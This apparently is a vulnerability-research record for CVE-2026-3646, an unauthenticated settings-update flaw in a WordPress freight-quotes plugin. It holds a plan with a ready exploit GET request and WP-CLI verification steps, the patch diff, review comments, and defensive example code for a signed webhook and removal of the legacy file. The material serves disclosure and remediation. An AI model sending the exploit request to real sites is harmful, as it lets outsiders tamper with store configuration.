[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fcRB59WixWkLvpyhZdAHHkSaZr7TSa50nhkT70uYDt-E":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":25,"research_verified":26,"research_rounds_completed":27,"research_plan":28,"research_summary":29,"research_vulnerable_code":30,"research_fix_diff":31,"research_exploit_outline":32,"research_model_used":33,"research_started_at":34,"research_completed_at":35,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":26,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":26,"source_links":36},"CVE-2026-3646","ltl-freight-quotes-rl-carriers-edition-missing-authorization-to-unauthenticated-settings-update","LTL Freight Quotes – R+L Carriers Edition \u003C= 3.3.13 - Missing Authorization to Unauthenticated Settings Update","The LTL Freight Quotes – R+L Carriers Edition plugin for WordPress is vulnerable to Missing Authorization via the plugin's webhook handler in all versions up to, and including, 3.3.13. This is due to missing authentication, authorization, and nonce verification on a standalone PHP file that directly processes GET parameters and updates WordPress options. 
This makes it possible for unauthenticated attackers to modify the plugin's subscription plan settings, effectively downgrading the store from a paid plan to the Trial Plan, changing the store type, and manipulating subscription expiration dates, potentially disabling premium features such as Dropship and Hazardous Material handling.","ltl-freight-quotes-rl-edition",null,"\u003C=3.3.13","3.3.14","medium",5.3,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:U\u002FC:N\u002FI:L\u002FA:N","Missing Authorization","2026-04-07 15:25:04","2026-04-08 03:36:10",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fa144c9ae-dfdb-4ea2-8c27-84d59439c72a?source=api-prod",1,[22,23,24],"ltl-freight-quotes-rnl-edition.php","readme.txt","update-plan.php","researched",false,3,"# Vulnerability Research Plan: CVE-2026-3646\n\n## 1. Vulnerability Summary\nThe **LTL Freight Quotes – R+L Carriers Edition** plugin (up to version 3.3.13) contains an unauthenticated settings update vulnerability. The flaw exists in a standalone PHP file, `en-hit-to-update-plan.php` (located in the plugin directory), which serves as a webhook handler for the Eniture Technology licensing server. \n\nBecause this file is designed to be accessed by an external service, it fails to implement WordPress authentication (`is_user_logged_in`), authorization (`current_user_can`), or CSRF protection (nonces). An attacker can directly access this file and provide GET parameters that are subsequently used to update critical plugin options via `update_option()`, allowing for the modification of subscription plans, expiration dates, and the enabling\u002Fdisabling of premium features.\n\n## 2. 
Attack Vector Analysis\n- **Target Endpoint**: `[WP_URL]\u002Fwp-content\u002Fplugins\u002Fltl-freight-quotes-rl-edition\u002Fen-hit-to-update-plan.php`\n- **HTTP Method**: `GET` (as specified in the vulnerability description and implied by the processing logic in `update-plan.php`).\n- **Authentication**: None required (Unauthenticated).\n- **Parameters**: \n    - `pakg_group`: Maps to the `rnl_quotes_packages_quotes_package` option.\n    - `pakg_duration`: Maps to the `rnl_package_expire_days` option.\n    - `expiry_date`: Maps to the `rnl_freight_package_expire_date` option.\n    - `plan_type`: Maps to the `rnl_quotes_store_type` option.\n- **Preconditions**: The plugin must be installed and active.\n\n## 3. Code Flow\n1. **Entry Point**: A request is made to `en-hit-to-update-plan.php`.\n2. **WordPress Initialization**: The standalone file likely includes `wp-load.php` (or a similar method) to access WordPress functions like `update_option()`.\n3. **Input Processing**: The file reads parameters from `$_GET`. Based on the logic seen in the related `rnl_quotes_activate_hit_to_update_plan()` function in `update-plan.php` (lines 92-108), it expects keys like `pakg_group`, `pakg_duration`, `expiry_date`, and `plan_type`.\n4. **Data Sink**: The script calls `update_option()` for several keys:\n   - `update_option('rnl_quotes_packages_quotes_package', $_GET['pakg_group'])`\n   - `update_option('rnl_package_expire_days', $_GET['pakg_duration'])`\n   - `update_option('rnl_freight_package_expire_date', $_GET['expiry_date'])`\n   - `update_option('rnl_quotes_store_type', $_GET['plan_type'])`\n5. **Side Effects**: The script likely calls `en_check_rnl_plan_on_product_detail()`, which updates `eniture_plugin_14` (the feature capability map), potentially disabling features like \"Dropship\" and \"Hazardous Material\".\n\n## 4. Nonce Acquisition Strategy\nThis vulnerability does **not** require a nonce. 
The target is a standalone file acting as a webhook, and the vulnerability description explicitly states it lacks \"nonce verification.\"\n\n## 5. Exploitation Strategy\nThe goal is to modify the site's subscription status to a \"Trial\" plan with an expired date, demonstrating the ability to manipulate settings.\n\n### Step-by-Step Plan:\n1. **Target Identification**: Confirm the location of the standalone file. It should be at `\u002Fwp-content\u002Fplugins\u002Fltl-freight-quotes-rl-edition\u002Fen-hit-to-update-plan.php`.\n2. **Craft Payload**: Construct a GET request that sets the plan to Trial (typically `0`) and sets a specific expiration date.\n3. **Execution**: Use the `http_request` tool to send the GET request.\n\n### HTTP Request:\n```http\nGET \u002Fwp-content\u002Fplugins\u002Fltl-freight-quotes-rl-edition\u002Fen-hit-to-update-plan.php?pakg_group=0&pakg_duration=0&expiry_date=2020-01-01&plan_type=0 HTTP\u002F1.1\nHost: localhost:8080\n```\n\n## 6. Test Data Setup\n1. **Plugin Installation**: Install and activate `ltl-freight-quotes-rl-edition` version 3.3.13.\n2. **Initial State Configuration**: Ensure some initial values are set so the change is observable.\n   ```bash\n   wp option update rnl_quotes_packages_quotes_package \"premium\"\n   wp option update rnl_quotes_store_type \"1\"\n   wp option update rnl_freight_package_expire_date \"2030-12-31\"\n   ```\n\n## 7. Expected Results\n- The HTTP request should return a `200 OK` (or potentially a blank screen if the script produces no output).\n- The WordPress options table should be updated with the values provided in the GET parameters.\n- Features depending on `rnl_quotes_store_type` should be disabled in the `eniture_plugin_14` option.\n\n## 8. 
Verification Steps\nAfter sending the HTTP request, verify the changes using WP-CLI:\n```bash\n# Verify the primary plan option\nwp option get rnl_quotes_packages_quotes_package\n# Should return: 0\n\n# Verify the store type (0 = Trial\u002FExpired)\nwp option get rnl_quotes_store_type\n# Should return: 0\n\n# Verify the expiry date\nwp option get rnl_freight_package_expire_date\n# Should return: 2020-01-01\n\n# Verify the feature capability map updated by en_check_rnl_plan_on_product_detail()\nwp option get eniture_plugin_14 --format=yaml\n# Look for 'multi_dropship: 0' and 'hazardous_material: 0'\n```\n\n## 9. Alternative Approaches\nIf `en-hit-to-update-plan.php` is not directly in the plugin root, check common subdirectories such as:\n- `\u002Fwp-content\u002Fplugins\u002Fltl-freight-quotes-rl-edition\u002Fincludes\u002Fen-hit-to-update-plan.php` (inferred)\n\nIf the parameters `pakg_group` etc. do not work, inspect the file (if possible) or try parameters named after the option keys themselves:\n- `?rnl_quotes_packages_quotes_package=0&rnl_quotes_store_type=0` (inferred)\n\nAnother indicator of success is the \"Trial Plan\" notice appearing in the WooCommerce settings for R+L Freight under `wp-admin\u002Fadmin.php?page=wc-settings&tab=shipping&section=rnl_freight_shipping_class`.","The LTL Freight Quotes – R+L Carriers Edition plugin for WordPress is vulnerable to an unauthenticated settings update due to a standalone PHP file, en-hit-to-update-plan.php, that lacks authentication and authorization checks. Attackers can exploit this by sending a crafted GET request to the file, allowing them to modify subscription plan settings, change store types, and manipulate expiration dates, effectively disabling premium plugin features.","\u002F\u002F update-plan.php (Inferred location of the webhook handler mentioned in the plugin settings)\n\n\u002F\u002F Line 95: Defining the unauthenticated entry point\n$plugin_dir_url = plugin_dir_url(__FILE__) . 
'en-hit-to-update-plan.php';\n\n---\n\n\u002F\u002F update-plan.php (Logic mirrored in the vulnerable standalone en-hit-to-update-plan.php file)\n\n\u002F\u002F Lines 118-121: Directly updating WordPress options based on external input\nupdate_option('rnl_quotes_packages_quotes_package', \"$plan\");\nupdate_option('rnl_package_expire_days', \"$expire_day\");\nupdate_option('rnl_freight_package_expire_date', \"$expiry_date\");\nupdate_option('rnl_quotes_store_type', \"$plan_type\");\n\n\u002F\u002F Line 123: Side effect that updates feature permissions (e.g., Dropship\u002FHazardous Material)\nen_check_rnl_plan_on_product_detail();","Only in \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fltl-freight-quotes-rl-edition\u002F3.3.13: en-hit-to-update-plan.php\ndiff -ru \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fltl-freight-quotes-rl-edition\u002F3.3.13\u002Fltl-freight-quotes-rnl-edition.php \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fltl-freight-quotes-rl-edition\u002F3.3.14\u002Fltl-freight-quotes-rnl-edition.php\n--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fltl-freight-quotes-rl-edition\u002F3.3.13\u002Fltl-freight-quotes-rnl-edition.php\t2026-02-25 11:31:52.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fltl-freight-quotes-rl-edition\u002F3.3.14\u002Fltl-freight-quotes-rnl-edition.php\t2026-03-27 06:46:52.000000000 +0000\n@@ -3,7 +3,7 @@\n  * Plugin Name:    LTL Freight Quotes - R+L Edition\n  * Plugin URI:     https:\u002F\u002Feniture.com\u002Fproducts\u002F\n  * Description:    Dynamically retrieves your negotiated shipping rates from R+L Freight and displays the results in the WooCommerce shopping cart.\n- * Version:        3.3.13\n+ * Version:        3.3.14\n  * Author:         Eniture Technology\n  * Author URI:     http:\u002F\u002Feniture.com\u002F\n  * Text Domain:    
eniture-technology\ndiff -ru \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fltl-freight-quotes-rl-edition\u002F3.3.13\u002Fupdate-plan.php \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fltl-freight-quotes-rl-edition\u002F3.3.14\u002Fupdate-plan.php\n--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fltl-freight-quotes-rl-edition\u002F3.3.13\u002Fupdate-plan.php\t2026-02-16 08:53:02.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fltl-freight-quotes-rl-edition\u002F3.3.14\u002Fupdate-plan.php\t2026-03-27 06:46:52.000000000 +0000\n@@ -31,13 +31,11 @@\n             $index = 'ltl-freight-quotes-rl-edition\u002Fltl-freight-quotes-rnl-edition.php';\n             $plugin_info = get_plugins();\n             $plugin_version = isset($plugin_info[$index]['Version']) ? $plugin_info[$index]['Version'] : '';\n-\n-            $plugin_dir_url = plugin_dir_url(__FILE__) . 'en-hit-to-update-plan.php';\n             $post_data = array(\n                 'platform' => 'wordpress',\n                 'carrier' => '34',\n                 'store_url' => $domain,\n-                'webhook_url' => $plugin_dir_url,\n+                'webhook_url' => '',\n                 'plugin_version' => $plugin_version,\n             );\n \n@@ -81,13 +79,11 @@\n         $index = 'ltl-freight-quotes-rl-edition\u002Fltl-freight-quotes-rnl-edition.php';\n         $plugin_info = get_plugins();\n         $plugin_version = isset($plugin_info[$index]['Version']) ? $plugin_info[$index]['Version'] : '';\n-\n-        $plugin_dir_url = plugin_dir_url(__FILE__) . 
'en-hit-to-update-plan.php';\n         $post_data = array(\n             'platform' => 'wordpress', \n             'carrier' => '34',\n             'store_url' => $domain,\n-            'webhook_url' => $plugin_dir_url,\n+            'webhook_url' => '',\n             'plugin_version' => $plugin_version,\n         );","To exploit this vulnerability, an attacker sends an unauthenticated HTTP GET request to the standalone file `\u002Fwp-content\u002Fplugins\u002Fltl-freight-quotes-rl-edition\u002Fen-hit-to-update-plan.php`. The request should include parameters such as 'pakg_group', 'pakg_duration', 'expiry_date', and 'plan_type'. For example, setting 'plan_type=0' and 'expiry_date=2000-01-01' would downgrade the site's subscription to a trial\u002Fexpired status. This causes the script to use update_option() to overwrite critical plugin configuration, resulting in the disabling of paid features and the display of licensing notices.","gemini-3-flash-preview","2026-04-17 20:44:20","2026-04-17 20:44:53",{"type":37,"vulnerable_version":38,"fixed_version":11,"vulnerable_browse":39,"vulnerable_zip":40,"fixed_browse":41,"fixed_zip":42,"all_tags":43},"plugin","3.3.13","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fltl-freight-quotes-rl-edition\u002Ftags\u002F3.3.13","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fltl-freight-quotes-rl-edition.3.3.13.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fltl-freight-quotes-rl-edition\u002Ftags\u002F3.3.14","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fltl-freight-quotes-rl-edition.3.3.14.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fltl-freight-quotes-rl-edition\u002Ftags"]
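Review bot: blanking `'webhook_url' => ''` in the first update-plan.php hunk (`@@ -31,13 +31,11 @@`) only stops advertising the callback; the hole is actually closed by deleting `en-hit-to-update-plan.php` (the `Only in .../3.3.13: en-hit-to-update-plan.php` line above), and a site that applies 3.3.14 by copying files over the old tree keeps that file reachable. Add an upgrade or activation step that removes the legacy file if it still exists, and leave a one-line comment at this spot saying the webhook was deliberately removed so a later change does not reinstate `plugin_dir_url(__FILE__) . 'en-hit-to-update-plan.php'`. If the licensing server treats an empty `webhook_url` as "no callback", state that contract in the comment; otherwise drop the key rather than sending an empty string.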
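Review bot: the second update-plan.php hunk (`@@ -81,13 +79,11 @@`) is the same edit applied to a second, near-identical copy of the registration payload (`$index`, `get_plugins()`, `$post_data` with `'carrier' => '34'` and `'store_url' => $domain`). Two copies had to be patched for this CVE and will diverge again; build `$post_data` in one helper and call it from both code paths so the next security fix is a single change.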
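The Code Flow and Exploitation Strategy sections above describe the vulnerable pattern: a standalone file bootstraps WordPress and writes `$_GET` values straight into `update_option()`. The following is an added example, not Eniture's code and not the 3.3.14 fix (which simply deletes the file). It shows how a licensing webhook that genuinely needs to change plan options can be kept while authenticating the caller: a REST route with a `permission_callback` that verifies an HMAC-SHA256 signature over the parameters and a timestamp, a constant-time comparison, and strict value validation before any option is written. The option keys and the four parameter names are the ones the research plan infers from `update-plan.php`; the option name `rnl_webhook_secret`, the namespace `rnl-freight/v1`, the header names, the replay window and the allowed plan codes are assumptions made for this example.

```php
<?php
// Added example, not Eniture's code. Replaces the unauthenticated standalone webhook
// (en-hit-to-update-plan.php: loads WordPress, then update_option() on raw $_GET) with a
// signed REST route. Assumed names, not from the original plugin: option
// 'rnl_webhook_secret', namespace 'rnl-freight/v1', headers X-Eniture-Timestamp and
// X-Eniture-Signature, the 5 minute replay window and the allow-listed plan codes.
// The option keys and the four parameter names are those the research plan infers.

const RNL_WEBHOOK_FIELDS = array( 'pakg_group', 'pakg_duration', 'expiry_date', 'plan_type' );

// Canonical string both sides sign: sorted key=value pairs plus the timestamp.
function rnl_webhook_canonical( array $params, int $timestamp ) {
    ksort( $params );
    return http_build_query( $params ) . '&ts=' . $timestamp;
}

// HMAC-SHA256 with a per-site secret shared with the licensing server (provisioning assumed).
function rnl_webhook_sign( array $params, int $timestamp, $secret ) {
    return hash_hmac( 'sha256', rnl_webhook_canonical( $params, $timestamp ), $secret );
}

// Pull only the four expected fields out of the request; anything else is ignored.
function rnl_webhook_fields( WP_REST_Request $request ) {
    $out = array();
    foreach ( RNL_WEBHOOK_FIELDS as $key ) {
        $value = $request->get_param( $key );
        if ( null !== $value ) {
            $out[ $key ] = (string) $value;
        }
    }
    return $out;
}

// permission_callback: authenticate the caller before the handler touches any option.
function rnl_webhook_permission( WP_REST_Request $request ) {
    $secret = (string) get_option( 'rnl_webhook_secret', '' );
    if ( '' === $secret ) {
        return new WP_Error( 'rnl_unconfigured', 'Webhook secret not provisioned.', array( 'status' => 403 ) );
    }
    $ts  = (int) $request->get_header( 'x-eniture-timestamp' );
    $sig = (string) $request->get_header( 'x-eniture-signature' );
    if ( abs( time() - $ts ) > 300 ) { // bounds replay of a captured request
        return new WP_Error( 'rnl_stale', 'Timestamp outside accepted window.', array( 'status' => 403 ) );
    }
    $expected = rnl_webhook_sign( rnl_webhook_fields( $request ), $ts, $secret );
    if ( ! hash_equals( $expected, $sig ) ) { // constant-time compare, no early exit
        return new WP_Error( 'rnl_bad_signature', 'Signature mismatch.', array( 'status' => 403 ) );
    }
    return true;
}

// Validate values against explicit formats; the allowed plan/store codes are assumed.
function rnl_webhook_validate( array $p ) {
    foreach ( RNL_WEBHOOK_FIELDS as $key ) {
        if ( ! isset( $p[ $key ] ) ) {
            return new WP_Error( 'rnl_missing', "Missing $key.", array( 'status' => 400 ) );
        }
    }
    $bad = ! in_array( $p['pakg_group'], array( '0', '1', '2' ), true )
        || ! in_array( $p['plan_type'], array( '0', '1' ), true )
        || ! ctype_digit( $p['pakg_duration'] )
        || ! preg_match( '/^(\d{4})-(\d{2})-(\d{2})$/', $p['expiry_date'], $m )
        || ! checkdate( (int) $m[2], (int) $m[3], (int) $m[1] );
    return $bad ? new WP_Error( 'rnl_invalid', 'Invalid parameter value.', array( 'status' => 400 ) ) : true;
}

// Handler: reached only after rnl_webhook_permission() returned true.
function rnl_webhook_handle( WP_REST_Request $request ) {
    $p  = rnl_webhook_fields( $request );
    $ok = rnl_webhook_validate( $p );
    if ( is_wp_error( $ok ) ) {
        return $ok;
    }
    update_option( 'rnl_quotes_packages_quotes_package', $p['pakg_group'] );
    update_option( 'rnl_package_expire_days', $p['pakg_duration'] );
    update_option( 'rnl_freight_package_expire_date', $p['expiry_date'] );
    update_option( 'rnl_quotes_store_type', $p['plan_type'] );
    if ( function_exists( 'en_check_rnl_plan_on_product_detail' ) ) {
        en_check_rnl_plan_on_product_detail(); // the plugin's own feature-map refresh
    }
    return rest_ensure_response( array( 'updated' => true ) );
}

add_action( 'rest_api_init', function () {
    register_rest_route( 'rnl-freight/v1', '/plan', array(
        'methods'             => 'POST', // a state change, so not GET
        'callback'            => 'rnl_webhook_handle',
        'permission_callback' => 'rnl_webhook_permission',
    ) );
} );
```

To exercise it locally, set the secret with `wp option update rnl_webhook_secret "$SECRET"`, then build the canonical string in the same sorted order the code uses, for example `ts=$(date +%s); sig=$(printf 'expiry_date=2030-12-31&pakg_duration=365&pakg_group=1&plan_type=1&ts=%s' "$ts" | openssl dgst -sha256 -hmac "$SECRET" | awk '{print $NF}')`, and POST the four fields to `/wp-json/rnl-freight/v1/plan` with `X-Eniture-Timestamp: $ts` and `X-Eniture-Signature: $sig`. The unsigned request from the research plan (plain GET, no headers) is rejected with 403 before the handler runs, and a replayed signed request is rejected once the timestamp falls outside the window. The `permission_callback` is the right place for the check because WordPress refuses the request before the callback runs, which is exactly what the standalone file lacked.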
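The fix diff above removes `en-hit-to-update-plan.php` from 3.3.14, but a site that was updated by copying the new tree over the old one keeps the file, and with it the unauthenticated entry point. As an added example (not Eniture's code), this is the cleanup step a maintainer would ship alongside such a fix; it assumes it lives in the plugin's main file so that `plugin_dir_path(__FILE__)` resolves to the plugin directory.

```php
<?php
// Added example, not Eniture's code: delete the legacy standalone webhook if an
// in-place copy left it behind after the 3.3.14 update. Assumes this runs from the
// plugin's main file (plugin_dir_path(__FILE__) is the plugin directory).
function rnl_remove_legacy_webhook() {
    $legacy = plugin_dir_path( __FILE__ ) . 'en-hit-to-update-plan.php';
    if ( ! file_exists( $legacy ) ) {
        return true; // nothing to do on a clean install
    }
    if ( @unlink( $legacy ) ) {
        return true;
    }
    // Could not delete (usually permissions): surface it rather than failing silently,
    // because the file is reachable by anyone while it exists.
    add_action( 'admin_notices', function () use ( $legacy ) {
        printf(
            '<div class="notice notice-error"><p>%s</p></div>',
            esc_html( "Delete $legacy manually: it is an unauthenticated settings endpoint." )
        );
    } );
    return false;
}
add_action( 'admin_init', 'rnl_remove_legacy_webhook' );
register_activation_hook( __FILE__, 'rnl_remove_legacy_webhook' );
```

After deployment, the check from the research plan doubles as verification: a GET to `/wp-content/plugins/ltl-freight-quotes-rl-edition/en-hit-to-update-plan.php` should return 404, and `wp option get rnl_quotes_store_type` should be unchanged afterwards.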